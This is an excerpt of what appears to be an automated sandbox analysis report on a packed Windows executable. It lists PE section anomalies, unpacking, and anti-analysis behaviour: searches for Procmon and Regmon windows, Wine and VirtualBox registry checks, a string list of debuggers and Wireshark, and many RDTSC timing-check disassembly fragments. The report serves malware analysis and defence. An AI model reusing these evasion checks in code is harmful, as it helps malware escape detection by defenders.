Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Tsy9P2T9yF.exeStatic file information: File size 4448768 > 1048576
Source: Tsy9P2T9yF.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: Tsy9P2T9yF.exeStatic PE information: Raw size of zxrdxyue is bigger than: 0x100000 < 0x1b6800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeUnpacked PE file: 0.2.Tsy9P2T9yF.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zxrdxyue:EW;xhtdnoyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zxrdxyue:EW;xhtdnoyt:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: Tsy9P2T9yF.exeStatic PE information: real checksum: 0x4494a3 should be: 0x44a648
Source: Tsy9P2T9yF.exeStatic PE information: section name:
Source: Tsy9P2T9yF.exeStatic PE information: section name: .idata
Source: Tsy9P2T9yF.exeStatic PE information: section name:
Source: Tsy9P2T9yF.exeStatic PE information: section name: zxrdxyue
Source: Tsy9P2T9yF.exeStatic PE information: section name: xhtdnoyt
Source: Tsy9P2T9yF.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_3_011ACB2C push 78011ACBh; retf 0_3_011ACB31
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_008341D0 push eax; mov dword ptr [esp], edx0_2_008341D5
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00532340 push eax; mov dword ptr [esp], 00000000h0_2_00532343
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0056C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0056C743
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004F0AC0 push eax; mov dword ptr [esp], 00000000h0_2_004F0AC4
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00511430 push eax; mov dword ptr [esp], 00000000h0_2_00511433
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_005339A0 push eax; mov dword ptr [esp], 00000000h0_2_005339A3
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_0050DAD0 push eax; mov dword ptr [esp], edx0_2_0050DAD1
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00839F40 push dword ptr [eax+04h]; ret 0_2_00839F6F
Source: Tsy9P2T9yF.exeStatic PE information: section name: zxrdxyue entropy: 7.955163779925324

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C41E8E second address: C41E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C41E92 second address: C41E9C instructions: 0x00000000 rdtsc 0x00000002 je 00007F804C8F2D9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4B17C second address: C4B180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4B180 second address: C4B1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F804C8F2DA8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4B1A3 second address: C4B1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F804CF71E76h 0x0000000c jl 00007F804CF71E76h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4B1B6 second address: C4B1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4B1BD second address: C4B1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4DF65 second address: C4DF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F804C8F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4DF6F second address: C4DF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b adc dx, 6AE1h 0x00000010 push 00000000h 0x00000012 adc si, 7B5Ah 0x00000017 push 6C9560E6h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4DF90 second address: C4E042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F804C8F2D9Bh 0x0000000f jno 00007F804C8F2D96h 0x00000015 popad 0x00000016 popad 0x00000017 xor dword ptr [esp], 6C956066h 0x0000001e jmp 00007F804C8F2D9Fh 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push 00000003h 0x00000029 mov ecx, dword ptr [ebp+122D189Dh] 0x0000002f push A68B317Bh 0x00000034 jmp 00007F804C8F2DA7h 0x00000039 add dword ptr [esp], 1974CE85h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F804C8F2D98h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a lea ebx, dword ptr [ebp+12453E5Ah] 0x00000060 jmp 00007F804C8F2D9Bh 0x00000065 push eax 0x00000066 jng 00007F804C8F2DA2h 0x0000006c jc 00007F804C8F2D9Ch 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E071 second address: C4E097 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804CF71E88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E097 second address: C4E0D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F804C8F2D96h 0x00000009 jmp 00007F804C8F2D9Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 mov ecx, dword ptr [ebp+122D1D34h] 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b xor dword ptr [ebp+122D1F20h], esi 0x00000021 mov dword ptr [ebp+122D2B59h], ecx 0x00000027 popad 0x00000028 push AF7C7338h 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jg 00007F804C8F2D96h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E0D2 second address: C4E0D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E0D6 second address: C4E149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 50838D48h 0x0000000e clc 0x0000000f pushad 0x00000010 or dword ptr [ebp+122D1EF4h], edi 0x00000016 mov di, ax 0x00000019 popad 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D1D3Fh], esi 0x00000022 push 00000000h 0x00000024 sub dword ptr [ebp+122D1F20h], edi 0x0000002a push 00000003h 0x0000002c push edx 0x0000002d sub dword ptr [ebp+122D1D39h], ebx 0x00000033 pop edi 0x00000034 call 00007F804C8F2D99h 0x00000039 pushad 0x0000003a jmp 00007F804C8F2DA4h 0x0000003f jmp 00007F804C8F2DA1h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F804C8F2D9Ch 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E149 second address: C4E15A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E15A second address: C4E17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c jg 00007F804C8F2D9Ch 0x00000012 pop eax 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E17C second address: C4E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E181 second address: C4E18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E18F second address: C4E193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E193 second address: C4E1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnp 00007F804C8F2D96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E269 second address: C4E288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F804CF71E85h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E288 second address: C4E28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E3C4 second address: C4E3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6D3F2 second address: C6D3FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6D70F second address: C6D743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a jp 00007F804CF71E90h 0x00000010 jmp 00007F804CF71E88h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F804CF71E76h 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6D9E4 second address: C6DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F804C8F2DA6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA03 second address: C6DA17 instructions: 0x00000000 rdtsc 0x00000002 js 00007F804CF71E7Eh 0x00000008 jl 00007F804CF71E76h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA17 second address: C6DA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA1B second address: C6DA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA1F second address: C6DA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DBBF second address: C6DBF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E85h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F804CF71E87h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DBF7 second address: C6DBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DBFB second address: C6DC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DC01 second address: C6DC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DD6E second address: C6DD82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F804CF71E76h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F804CF71E76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E01C second address: C6E032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F804C8F2D96h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007F804C8F2D96h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E032 second address: C6E047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F804CF71E76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F804CF71E76h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E1B3 second address: C6E1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jne 00007F804C8F2D98h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E69F second address: C6E6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E6A5 second address: C6E6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C3B1C6 second address: C3B1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F19C second address: C6F1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F1A0 second address: C6F1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F804CF71E76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F1AC second address: C6F1B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F4AF second address: C6F4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F4B7 second address: C6F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F4BB second address: C6F4BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4557C second address: C45585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C45585 second address: C45591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F804CF71E76h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C45591 second address: C45595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C75549 second address: C7554E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C73D25 second address: C73D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74503 second address: C74508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74508 second address: C74520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F804C8F2D9Ch 0x00000012 jnc 00007F804C8F2D96h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74520 second address: C74526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74526 second address: C7452A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7452A second address: C7452E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C75667 second address: C756AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 ja 00007F804C8F2D96h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ecx 0x00000014 jmp 00007F804C8F2DA6h 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F804C8F2DA5h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7A1BD second address: C7A1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F804CF71E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7A44B second address: C7A451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7A451 second address: C7A481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F804CF71E7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F804CF71E7Ah 0x00000012 jmp 00007F804CF71E82h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7B3BC second address: C7B3C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7B3C0 second address: C7B3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F804CF71E7Ch 0x0000000c jng 00007F804CF71E76h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7B915 second address: C7B919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
